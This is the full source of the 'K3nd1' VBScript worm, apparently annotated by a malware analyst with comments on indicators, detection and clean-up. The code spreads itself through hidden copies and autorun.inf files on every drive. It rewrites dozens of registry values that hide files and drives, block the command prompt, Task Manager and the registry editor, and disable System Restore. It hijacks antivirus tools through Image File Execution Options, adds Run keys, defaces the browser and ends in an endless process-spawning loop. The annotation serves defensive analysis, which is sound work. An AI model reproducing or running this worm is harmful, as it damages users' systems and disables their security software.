' Analyst notes for this section: setup and local drops of the "K3nd1" VBScript.
' It turns off error reporting, reads the script's own source into memory and
' attempts to place copies in fixed locations on C: and in the Windows and
' System folders. The file names and paths below are usable as host indicators.

' All runtime errors from here on are ignored, so any statement below can fail
' silently. Treat every artefact in this listing as "attempted", not guaranteed.
on error resume next
' i (assigned further down) is not in this Dim list; no Option Explicit is
' present, so the undeclared name is accepted.
dim a,b,c,d,e,f,g,h,K3nd1,j,l,m,n
' h holds the body of an autorun.inf whose shellexecute entry starts
' wscript.exe on K3nd1.vbs. Disabling AutoRun/AutoPlay for removable media
' neutralises this launcher.
h = "[autorun]" & vbcrlf & "shellexecute=wscript.exe K3nd1.vbs"
' a = FileSystemObject; b = File object for the script that is running.
set a = createobject("Scripting.filesystemobject")
set b = a.getfile(Wscript.ScriptFullname)
' The source path "K3nd1.vbs" is relative, so it is resolved against the
' process's current directory. Targets: C:\WinNT.Dat and a K3nd1.vbs in the
' System32 folder under both C:\Windows and C:\Winnt.
a.CopyFile "K3nd1.vbs", "C:\WinNT.Dat"
a.CopyFile "K3nd1.vbs", "C:\Windows\System32\K3nd1.vbs"
a.CopyFile "K3nd1.vbs", "C:\Winnt\System32\K3nd1.vbs"
' n (own file size) is not read again in this listing.
n = b.size
' i = DriveType of the drive the script was launched from
' (FileSystemObject values: 1 = removable, 2 = fixed).
i = b.drive.drivetype
' Open the running script for reading (1 = ForReading, -2 = system default
' encoding) and accumulate its full text in c, one line at a time.
set m = b.openastextstream(1,-2)
do while not m.atendofstream
c = c & m.readline
c = c & vbcrlf
loop
' GetSpecialFolder(0) is the Windows folder, GetSpecialFolder(1) the System folder.
Set d = a.getspecialfolder(0)
' NOTE(review): the two CopyFile calls below pass one parenthesised expression
' instead of a source and a destination; they presumably raise an error that is
' suppressed above. Confirm in a sandbox before relying on "K3nd1.jpg.vbs" in
' the Windows folder as an indicator.
a.CopyFile WScript.ScriptFullname(d & "\K3nd1.jpg.vbs")
Set e = a.getspecialfolder(1)
a.CopyFile WScript.ScriptFullname(e & "\K3nd1.vbs")
' Attributes = 32 (Archive only) clears read-only/hidden/system on an existing
' copy so that it can be overwritten.
set f = a.getfile(e & "\K3nd1.vbs")
f.attributes = 32
' CreateTextFile's positional arguments are filename, overwrite, unicode: the 2
' is a truthy overwrite flag and true requests Unicode output. c is then written.
set f = a.createtextfile(e & "\K3nd1.vbs",2,true)
f.write c
f.close
' Attributes = 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32), so the
' dropped file is not shown by a default Explorer view or a plain "dir".
set f = a.getfile(e & "\K3nd1.vbs")
f.attributes = 39
' Analyst notes for this section: per-drive propagation. For every removable
' (DriveType 1) or fixed (DriveType 2) drive other than A:, the script attempts
' to leave K3nd1.vbs and autorun.inf in the drive root, both with attributes 39
' (ReadOnly + Hidden + System + Archive).
' Hunting: look for a hidden+system autorun.inf in a drive root whose
' shellexecute line invokes wscript.exe, next to a hidden K3nd1.vbs.
' Errors are suppressed earlier in the script, so each step here may be skipped
' silently on a given host.
for each g in a.drives
If (g.drivetype = 1 or g.drivetype = 2) and g.path <> "A:" then
' Resets the attributes of "K3nd1.sys.vbs" (note the different file name from
' the one written just below) to Archive only.
set f = a.getfile(g.path &"\K3nd1.sys.vbs")
f.attributes = 32
' NOTE(review): this CreateTextFile is called on the drive object g, whereas
' the autorun.inf write below uses the FileSystemObject a. Confirm in a sandbox
' which of the two writes actually lands.
set f = g.createtextfile(g.path &"\K3nd1.vbs",2,true)
' c is the script's own source text, read earlier in the script.
f.write c
f.close
set f = a.getfile(g.path &"\K3nd1.vbs")
f.attributes = 39
' Clear the attributes of any existing autorun.inf, overwrite it with h (the
' [autorun] body built at the top of the script), then hide it again.
set f = a.getfile(g.path &"\autorun.inf")
f.attributes = 32
set f = a.createtextfile(g.path &"\autorun.inf",2,true)
f.write h
f.close
set f = a.getfile(g.path &"\autorun.inf")
f.attributes= 39
end if
Next
' Analyst notes for this section: registry tampering through WScript.Shell
' RegWrite. Every key/value pair below is a host indicator and also the list of
' values to delete or reset during clean-up.
' The HKEY_CURRENT_USER writes succeed for the logged-on user. The
' HKEY_LOCAL_MACHINE and HKEY_CLASSES_ROOT writes normally need administrative
' rights, so running users without admin rights limits the impact to the
' per-user settings. Failures are silent because errors are suppressed earlier
' in the script.
set K3nd1 = createobject("WScript.Shell")
' Internet Explorer window title (overwritten again further down).
K3nd1.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: I Like this ha ha ha ::"
' Explorer view settings. HideFileExt = 1 hides known file extensions, which
' helps a .vbs file pass as something else.
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
' Per-user shell policy restrictions. Taken together they remove the UI paths a
' user would use to investigate or undo the changes (Run, Find, Folder Options,
' context menus, desktop, Windows-key shortcuts).
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
' Same value as three lines above (NoTrayContextMenu is written twice).
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
' NoDrives is a bit mask with one bit per drive letter; 67108863 = 2^26 - 1
' sets all 26 bits, hiding every drive in Explorer.
K3nd1.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
' Per-user policies that block the command prompt, registry editing tools and
' Task Manager, plus two Display control-panel restrictions. New DisableTaskMgr /
' DisableRegistryTools / DisableCMD values are a high-signal detection source.
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
' Browser defacement: final IE window title and start page. Both strings are
' distinctive indicators.
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Hacked By QrembiezS ... Contact Me To Clean Up"
K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://qrembiezshack.blogspot.com"
' Run-key value named "svchost". winpath is not assigned anywhere in this
' listing, so the data written is presumably just "\svchost.exe.vbs".
K3nd1.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost",winpath&"\svchost.exe.vbs"
' Machine-wide counterparts of the shell and system restrictions above.
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
' A second Run-key value, "System Monitoring", holding the DWORD 1 rather than
' a command line.
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
' Logon banner caption and text. When hunting, use the key path exactly as
' spelled here. The text is Indonesian, roughly: "Above the sky there is still
' sky ... Nothing is 100 percent safe from viruses ... never be arrogant about
' your security system!"
K3nd1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Virus K3nd1"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Di atas langit masih ada langit ... Tidak ada kata 100 persen aman dari virus ... jangan pernah sombong dengan system keamananmu!"
' Image File Execution Options "Debugger" values. With such a value set,
' Windows starts the named debugger (here notepad.exe) in place of the listed
' image. The list covers built-in admin tools, generic installer names and
' several antivirus / removal-tool executable names.
' Detection: alert on any creation of a Debugger value under this key (for
' example through registry auditing or Sysmon registry events); legitimate use
' is rare. Clean-up has to remove these values before the listed tools will
' start again.
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
K3nd1.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","notepad.exe"
K3nd1.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmadAV 3.4.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GAV.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\evest.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVG.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Norton.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kaspersky.exe\Debugger","notepad.exe"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\power remover.exe\Debugger","notepad.exe"
' Repeats the logon banner caption written earlier in this section.
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Virus K3nd1"
' Recovery inhibition: policy values that disable Windows Installer and System
' Restore (and its configuration UI). Check these before relying on a restore
' point during clean-up.
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
' Changes the icon shown for .vbs files to resource index 3 of shell32.dll
' (presumably a folder icon; verify on the affected Windows version). Combined
' with hidden extensions, a dropped .vbs can be mistaken for a folder.
K3nd1.Regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon\","shell32.dll,3"
' Analyst notes for this section: blind copy to fixed paths. C:\WinNT.Dat (a
' copy of the script made earlier in the listing) is copied to C:\Help.cfg and
' then to a K3nd1.vbs path for each drive letter a: through z:, with the paths
' exactly as spelled below. No check is made that a drive exists; errors are
' suppressed earlier in the script, so missing or read-only drives are skipped
' silently.
' Indicators: C:\WinNT.Dat, C:\Help.cfg and K3nd1.vbs in the root of any local,
' removable or mapped drive. Unlike the copies written in the per-drive loop
' earlier in the script, nothing in this section changes file attributes.
a.CopyFile "C:\WinNT.Dat", "C:\Help.cfg"
' Source and destination differ only in letter case.
a.CopyFile "C:\WinNT.Dat", "C:\WinNT.DAT"
a.CopyFile "C:\WinNT.dat", "a:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "b:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "c:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "d:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "e:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "f:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "g:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "h:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "i:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "j:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "k:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "l:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "m:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "n:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "o:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "p:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "q:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "r:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "s:s\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "t:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "u:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "v:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "w:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "x:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "y:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "z:\K3nd1.vbs"
' Analyst notes for this section: payload loop. i holds the DriveType of the
' drive the script was launched from, assigned earlier in the script
' (1 = removable). Launched from a removable drive, both conditions are false
' and the script ends here. Launched from anywhere else, it sleeps 200000 ms
' (200 seconds) and then enters the loop below.
if i <> 1 then
Wscript.sleep 200000
end if
' i is never changed inside the loop, so once entered it has no exit condition.
' Each pass starts explorer.exe from the Windows folder (d) with /e,/select on
' the script's own path, with no delay between launches.
' Detection: a wscript.exe parent repeatedly spawning explorer.exe with
' "/e,/select," and a .vbs path on the command line. Containment: end the
' wscript.exe process.
do while i <> 1
set j = createobject("Wscript.shell")
j.run d & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
loop